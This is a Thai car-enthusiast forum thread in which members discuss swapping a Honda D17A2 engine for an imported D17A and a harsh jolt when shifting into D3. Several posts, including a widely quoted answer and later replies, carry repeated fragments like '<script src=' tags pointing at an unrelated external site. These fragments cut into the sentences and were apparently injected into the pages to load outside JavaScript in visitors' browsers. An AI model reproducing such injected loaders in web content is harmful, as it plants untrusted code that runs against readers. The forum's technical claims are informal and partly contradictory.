ตอบ
AlcoHolMan


เข้าร่วม: 30 พฤศจิกา 2011
ตอบ: 17

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 8
ให้คำขอบคุณ: 0
อังคาร, 25 กันยา 2012 20:55 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
เปลี่ยนเครื่องจาก D17A2 เป็น D17A
ใส่เกียร์ D4 ขับได้ปกติ แต่ทำไมใส่ D3 แล้วเป็นเกียร์อะไรก็ไม่รู้รถกระชากหน้าทิ่มเลยครับ
ขอจะมีทางแก้มั้ยครับ หรือต้องเอาเกียร์เครื่องเดิมมาใส่
หรือเปลี่ยนคันเกียร์ถึงจะใช้เกียร์ได้ปกติ
ได้รับคำขอบคุณจาก: MALLMAR 
wittayab


เข้าร่วม: 19 พฤศจิกา 2008
ตอบ: 979

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1633
ให้คำขอบคุณ: 226

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 25 กันยา 2012 21:54 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
รอผู้รู้มาตอบครับ อยากรู้เหมือนกันครับ
ได้รับคำขอบคุณจาก: MALLMAR 
prgs55


ชื่อเล่น: เล็ก

เข้าร่วม: 26 มิถุนา 2010
ตอบ: 861

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1794
ให้คำขอบคุณ: 1103

ที่อยู่: ย่านมีนบุรี
ปี: 2001
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 25 กันยา 2012 22:22 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
อยากร้ด้วยครับ แล้วเครื่อง D17A2 มันต่างกับ D17A อย่างไร
ได้รับคำขอบคุณจาก: MALLMAR 
OiShIz


ชื่อเล่น: ไดร์ฟ

เข้าร่วม: 13 พฤศจิกา 2009
ตอบ: 969

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1576
ให้คำขอบคุณ: 2107

ที่อยู่: กทม
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 25 กันยา 2012 22:24 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
อยากรู้ด้วยคนค๊าบ
ได้รับคำขอบคุณจาก: MALLMAR 
tokmun002


ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ที่อยู่: พระประแดง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 25 กันยา 2012 22:35 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
เครื่องD17A2และเครื่องD17Aต่างกันแน่ครับ!
เท่าที่ผมทราบคือ. รหัสเครื่องครับ"". {*<>*} <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: MALLMAR 
prodrive


เข้าร่วม: 28 พฤศจิกา 2008
ตอบ: 742

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 1000

ที่อยู่: URT>>>BKK.RAMINTRA39
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 26 กันยา 2012 02:14 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
d17a2 คือเครื่องที่อยู่ในรถของเราที่ผลิตในเมืองไทยครับ ส่วน d17aเนี่ยเป็นเครื่องนำเข้ามาครับคือเครื่องd17a2พังแล้วไปซื้อเชียงกงก็จะเป็นd17aประมาณนั้นครับ จะอยู่ใน Stream ความแรงไม่ต่างกันครับ แต่ก้นอ่าง d17a จะเป็นเหล็ก d17a2 เป็นอลูมีเนียม ใช้กล่องร่วมกันได้ครับ กรณี MT หรือเอาเครื่อง ที่เป็น AT มาชน MT เดิมก็ตัดระบบ AT เดิมทิ้งได้เลย อาจจะมีปัญหาเรื่องหัวปลั๊กไม่เหมือนกันไม่ใช่ปัญหา แค่ตัดต่อกับสายของปลั๊กเดิมครับ แต่ในกรณีเกียร์ AT อาจจะไม่ได้ เพราะจะมีเกียร์นอกที่เป็น CVT ด้วยเลย(บางประเทศ)ต้องซื้อมาแบบติดกล่องมาด้วยครับ 

ส่วนปัญหาที่ว่าใส่เกียร์ D4 ขับได้ปกติ แต่ทำไมใส่ D3 แล้วเป็นเกียร์อะไรก็ไม่รู้รถกระชากหน้าทิ่มเนี่ย ผมว่ามันปกตินะเกียร์สูงอยู่แล้วลดเกียร์ต่ำลงมามันก็หน้าทิ่ม แต่ไม่รู้ว่าอาการที่ว่ามันเป็นอย่างไรทิ่มหนักเบาแค่ไหนผมไม่เห็นก็ตอบยากครับ ปล.ระวังช่างกากๆเอาน้ำมันเกียร์ CVT มาใส่นะครับถ้าเกียร์ที่ใช้เป็น 4 speed อยู่ครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">  
ได้รับคำขอบคุณจาก: MALLMAR  Phetcharat  hacker  pairach_c  pond6966  PP_ES  es330  TUNG11  toptwo  Jom-marn  Jameskab  domziia  LE0NIDAS  Suyodjg  konmaisumkan.wave  qq  jeang 
MALLMAR


เข้าร่วม: 19 พฤศจิกา 2010
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 520
ให้คำขอบคุณ: 6319

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 26 กันยา 2012 07:51 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
....
AlcoHolMan


เข้าร่วม: 30 พฤศจิกา 2011
ตอบ: 17

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 8
ให้คำขอบคุณ: 0
พุธ, 26 กันยา 2012 08:16 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
น่าจะเป็นเกียร์ CVT ติดเครื่องมาครับ
เพราะตอนเร่งเครื่องไปถึงความเร็วประมาณ100 รอบเครื่องประมาณ 3000
แต่แช่ไว้ที่100 ผ่านไปประมาณ3วิ รอบจะตกลงมาที่ 2700

ส่วนเวลาใส่D3แล้วหัวทิ่ม ทิ่มแรงมาก มากชนิดที่ว่าล้อลั่นเอี๊ยดด

รอผู้รู้มาหาทางช่วยต่อไปครับ
prodrive


เข้าร่วม: 28 พฤศจิกา 2008
ตอบ: 742

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 1000

ที่อยู่: URT>>>BKK.RAMINTRA39
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 26 กันยา 2012 09:26 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
ผมว่าปกตินะครับลองรถเพื่อนมาก็หน้าทิ่ม ที่รอบเครื่องตกลงมา3000-2700
ก็ถูกครับทอร์คคอนเวอร์ทเตอร์ทำงาน และที่บอกมาผมฟันธงอย่างครับไม่ใช่ cvt
ถ้าเป็นcvt รอบเครื่องและความเร็วจะขึ้นคล้ายๆพวกmio fino click อ่ะครับ
แต่อย่างที่บอกอ่ะครับไม่รู้ว่าทิ่มมากน้อยยังไงเลยวิเคราะห์ไม่ได้ว่าปกติหรือไม่ในกรณีนี้อ่ะครับ
ได้รับคำขอบคุณจาก: jeang 
mr.smith


เข้าร่วม: 26 มิถุนา 2009
ตอบ: 169

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 157
ให้คำขอบคุณ: 99

ที่อยู่: กำแพงเพชร
ปี: 2002
พุธ, 26 กันยา 2012 09:38 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
ผมก็เปลี่ยนจาก D17a2 มาเป็น D17a ชนกับเกียร์ AT เดิม กล่องเดิม เสียบปลั๊ก ใช้ได้เลยครับ ไม่ต้องแปลง 
POP_ES05


ชื่อเล่น: ป๊อบ

เข้าร่วม: 13 ธันวา 2011
ตอบ: 679

Guru ES
Guru ES

ได้รับคำขอบคุณ: 350
ให้คำขอบคุณ: 1909

ที่อยู่: ภูเก็ต - นครศรีฯ
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 26 กันยา 2012 09:45 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
เก็บความรู้ด้วยคนค๊าบบบ
pond6966


ชื่อเล่น: ปอน

เข้าร่วม: 23 พฤษภาคม 2012
ตอบ: 425

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 496
ให้คำขอบคุณ: 331

ที่อยู่: ประดิพัทธิ์
ปี: 2002
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 26 กันยา 2012 11:19 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
prodrive พิมพ์ว่า:
d17a2 คือเครื่องที่อยู่ในรถของเราที่ผลิตในเมืองไทยครับ ส่วน d17aเนี่ยเป็นเครื่องนำเข้ามาครับคือเครื่องd17a2พังแล้วไปซื้อเชียงกงก็จะเป็นd17aประมาณนั้นครับ จะอยู่ใน Stream ความแรงไม่ต่างกันครับ แต่ก้นอ่าง d17a จะเป็นเหล็ก d17a2 เป็นอลูมีเนียม ใช้กล่องร่วมกันได้ครับ กรณี MT หรือเอาเครื่อง ที่เป็น AT มาชน MT เดิมก็ตัดระบบ AT เดิมทิ้งได้เลย อาจจะมีปัญหาเรื่องหัวปลั๊กไม่เหมือนกันไม่ใช่ปัญหา แค่ตัดต่อกับสายของปลั๊กเดิมครับ แต่ในกรณีเกียร์ AT อาจจะไม่ได้ เพราะจะมีเกียร์นอกที่เป็น CVT ด้วยเลย(บางประเทศ)ต้องซื้อมาแบบติดกล่องมาด้วยครับ 

ส่วนปัญหาที่ว่าใส่เกียร์ D4 ขับได้ปกติ แต่ทำไมใส่ D3 แล้วเป็นเกียร์อะไรก็ไม่รู้รถกระชากหน้าทิ่มเนี่ย ผมว่ามันปกตินะเกียร์สูงอยู่แล้วลดเกียร์ต่ำลงมามันก็หน้าทิ่ม แต่ไม่รู้ว่าอาการที่ว่ามันเป็นอย่างไรทิ่มหนักเบาแค่ไหนผมไม่เห็นก็ตอบยากครับ ปล.ระวังช่างกากๆเอาน้ำมันเกียร์ CVT มาใส่นะครับถ้าเกียร์ที่ใช้เป็น 4 speed อยู่ครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">  




ขอบคุณครับ
bankabby


ชื่อเล่น: แบงค์

เข้าร่วม: 10 มิถุนา 2012
ตอบ: 1504

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1642
ให้คำขอบคุณ: 2485

ที่อยู่: หาดใหญ่
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 26 กันยา 2012 11:39 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
prodrive พิมพ์ว่า:
d17a2 คือเครื่องที่อยู่ในรถของเราที่ผลิตในเมืองไทยครับ ส่วน d17aเนี่ยเป็นเครื่องนำเข้ามาครับคือเครื่องd17a2พังแล้วไปซื้อเชียงกงก็จะเป็นd17aประมาณนั้นครับ จะอยู่ใน Stream ความแรงไม่ต่างกันครับ แต่ก้นอ่าง d17a จะเป็นเหล็ก d17a2 เป็นอลูมีเนียม ใช้กล่องร่วมกันได้ครับ กรณี MT หรือเอาเครื่อง ที่เป็น AT มาชน MT เดิมก็ตัดระบบ AT เดิมทิ้งได้เลย อาจจะมีปัญหาเรื่องหัวปลั๊กไม่เหมือนกันไม่ใช่ปัญหา แค่ตัดต่อกับสายของปลั๊กเดิมครับ แต่ในกรณีเกียร์ AT อาจจะไม่ได้ เพราะจะมีเกียร์นอกที่เป็น CVT ด้วยเลย(บางประเทศ)ต้องซื้อมาแบบติดกล่องมาด้วยครับ 

ส่วนปัญหาที่ว่าใส่เกียร์ D4 ขับได้ปกติ แต่ทำไมใส่ D3 แล้วเป็นเกียร์อะไรก็ไม่รู้รถกระชากหน้าทิ่มเนี่ย ผมว่ามันปกตินะเกียร์สูงอยู่แล้วลดเกียร์ต่ำลงมามันก็หน้าทิ่ม แต่ไม่รู้ว่าอาการที่ว่ามันเป็นอย่างไรทิ่มหนักเบาแค่ไหนผมไม่เห็นก็ตอบยากครับ ปล.ระวังช่างกากๆเอาน้ำมันเกียร์ CVT มาใส่นะครับถ้าเกียร์ที่ใช้เป็น 4 speed อยู่ครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">


เน้นๆเลยครับ 
puyzaaaaa


ชื่อเล่น: ปุ่ย

เข้าร่วม: 10 เมษา 2011
ตอบ: 3008

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3014
ให้คำขอบคุณ: 3113

ที่อยู่: พิษณุโลก
ปี: 2004
พุธ, 26 กันยา 2012 18:32 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
รู้อีก เยอะเลยครับ เก็บๆ 
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2971

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 27 กันยา 2012 11:19 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
ผมใช้ d17a อ่างน้ำมันเป็นอลูมิเนียม
ได้รับคำขอบคุณจาก: prodrive 
prodrive


เข้าร่วม: 28 พฤศจิกา 2008
ตอบ: 742

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 1000

ที่อยู่: URT>>>BKK.RAMINTRA39
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 27 กันยา 2012 22:49 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
lkki5 พิมพ์ว่า:
ผมใช้ d17a อ่างน้ำมันเป็นอลูมิเนียม


อ้าวเหรอครับของผมก็D17A น่าจะเป็นเรื่องของว่าเอามาจากรถอะไรมากกว่านะถ้างั้น ของผมเป็นเหล็กแฮะ
sett_w


ชื่อเล่น: เสฎ

เข้าร่วม: 27 กันยา 2011
ตอบ: 331

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 226
ให้คำขอบคุณ: 116

ที่อยู่: คอนหวัน-กทม.
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 25 เมษา 2014 20:02 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
"<script src="https://sport32news.com/civicesgroup.js"> เท่าที่ผมทราบมาว่าเครื่องD17a2(Esไทย)จะเป็น4เกียร์ แต่ถ้าเป็นD17a(จะเป็นเครื่องที่อยู่ในstram ญี่ปุ่นจะเป็น5เกียร์) อาการขอว จขกท.ที่กล่าวมาลองเข้าไปดูในกะทู้เรื่องเปลี่ยนเกียร์มาจากเชียงกงดูครับผมว่าน่าจะหายเห็นมีท่านนึงโพสไว้ เพราะผมก็กำลังศึกษาอยู่เหมือนกันครับเพราะเครื่องเดิมผมก็D17a2 กำลังจะเปลี่ยนเป็นD17a ของstram ญี่ปุ่นเหมือนกันครับ
vattanakan


ชื่อเล่น: มิค

เข้าร่วม: 10 ธันวา 2013
ตอบ: 130

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 84
ให้คำขอบคุณ: 74

ที่อยู่: ลอง แพร่ , เรียน ม.พะเยา ครัชผม ^_^
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 25 เมษา 2014 20:48 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
D3 หัวทิ่ม น่าสน "<script src="https://sport32news.com/civicesgroup.js">
sett_w


ชื่อเล่น: เสฎ

เข้าร่วม: 27 กันยา 2011
ตอบ: 331

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 226
ให้คำขอบคุณ: 116

ที่อยู่: คอนหวัน-กทม.
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 29 เมษา 2014 23:18 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
mr.smith พิมพ์ว่า:
ผมก็เปลี่ยนจาก D17a2 มาเป็น D17a ชนกับเกียร์ AT เดิม กล่องเดิม เสียบปลั๊ก ใช้ได้เลยครับ ไม่ต้องแปลง 




แล้วมันมีกี่สปีดครับD17a(สตรีม) ESมี4สปีด ต่างกันมั๊ยครับ"<script src="https://sport32news.com/civicesgroup.js">
jrbehind


เข้าร่วม: 08 มกรา 2015
ตอบ: 1

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 0
ให้คำขอบคุณ: 0
พฤหัส, 8 มกรา 2015 23:40 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
ผมก็มีอาการแบบเดียวกันเลยคับ หลังจากที่ผมลองไล่เกียร ดู ที่หายไป คือ D3 มีแค่ Dแล้วก็ข้ามไป2เลย (ผมเพิ่งซื้อรถต่อเค้ามาอีกทีเค้าเปลี่ยนแค่เครื่องมาอย่างเดียวไม่นึกว่าจะเปลี่ยนเกียร์ด้วย แตคันเกียร์อันเดิม ) คันเกียรนอก น่าจะเป็นแบบ OD นะ ผมคิดว่างั้น
 
LE0NIDAS


ชื่อเล่น: นูญ

เข้าร่วม: 21 เมษา 2013
ตอบ: 103

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 135
ให้คำขอบคุณ: 101

ที่อยู่: บางนา
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 9 มกรา 2015 09:24 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
prodrive พิมพ์ว่า:
d17a2 คือเครื่องที่อยู่ในรถของเราที่ผลิตในเมืองไทยครับ ส่วน d17aเนี่ยเป็นเครื่องนำเข้ามาครับคือเครื่องd17a2พังแล้วไปซื้อเชียงกงก็จะเป็นd17aประมาณนั้นครับ จะอยู่ใน Stream ความแรงไม่ต่างกันครับ แต่ก้นอ่าง d17a จะเป็นเหล็ก d17a2 เป็นอลูมีเนียม ใช้กล่องร่วมกันได้ครับ กรณี MT หรือเอาเครื่อง ที่เป็น AT มาชน MT เดิมก็ตัดระบบ AT เดิมทิ้งได้เลย อาจจะมีปัญหาเรื่องหัวปลั๊กไม่เหมือนกันไม่ใช่ปัญหา แค่ตัดต่อกับสายของปลั๊กเดิมครับ แต่ในกรณีเกียร์ AT อาจจะไม่ได้ เพราะจะมีเกียร์นอกที่เป็น CVT ด้วยเลย(บางประเทศ)ต้องซื้อมาแบบติดกล่องมาด้วยครับ 

ส่วนปัญหาที่ว่าใส่เกียร์ D4 ขับได้ปกติ แต่ทำไมใส่ D3 แล้วเป็นเกียร์อะไรก็ไม่รู้รถกระชากหน้าทิ่มเนี่ย ผมว่ามันปกตินะเกียร์สูงอยู่แล้วลดเกียร์ต่ำลงมามันก็หน้าทิ่ม แต่ไม่รู้ว่าอาการที่ว่ามันเป็นอย่างไรทิ่มหนักเบาแค่ไหนผมไม่เห็นก็ตอบยากครับ ปล.ระวังช่างกากๆเอาน้ำมันเกียร์ CVT มาใส่นะครับถ้าเกียร์ที่ใช้เป็น 4 speed อยู่ครับ
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">  


สงสัยมานาน ได้คำตอบซะที ขอบคุณครับ
wisarutj


ชื่อเล่น: รุต

เข้าร่วม: 21 กรกฎา 2010
ตอบ: 798

Guru ES
Guru ES

ได้รับคำขอบคุณ: 482
ให้คำขอบคุณ: 9

ที่อยู่: Rayong
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 10 มกรา 2015 09:58 - เปลี่ยนเครื่องจาก D17A2 เป็น D17A
ความรู้ เผื่อเปลี่ยนเครื่อง
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.